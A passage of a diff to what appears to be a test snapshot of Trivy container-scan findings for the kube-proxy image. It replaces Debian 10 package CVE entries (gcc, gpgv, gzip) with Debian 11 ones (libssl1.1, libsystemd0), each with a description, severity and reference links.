"https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5446-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", - ], - }, - "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.2.12-1+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Signature spoofing via status line injection", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6039-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], "severity": "MEDIUM", @@ -153574,77 +153937,77 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-14855", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-14855", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", - "https://dev.gnupg.org/T4755", - "https://eprint.iacr.org/2020/014.pdf", - "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", - "https://rwc.iacr.org/2020/slides/Leurent.pdf", - "https://ubuntu.com/security/notices/USN-4516-1", - "https://usn.ubuntu.com/4516-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", + "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-14855", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-14855", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/T4755", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://eprint.iacr.org/2020/014.pdf", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4516-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4516-1/", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], "severity": "LOW", @@ -153652,1806 +154015,2029 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.9-3+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.9-3", - "packageName": "gzip", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", 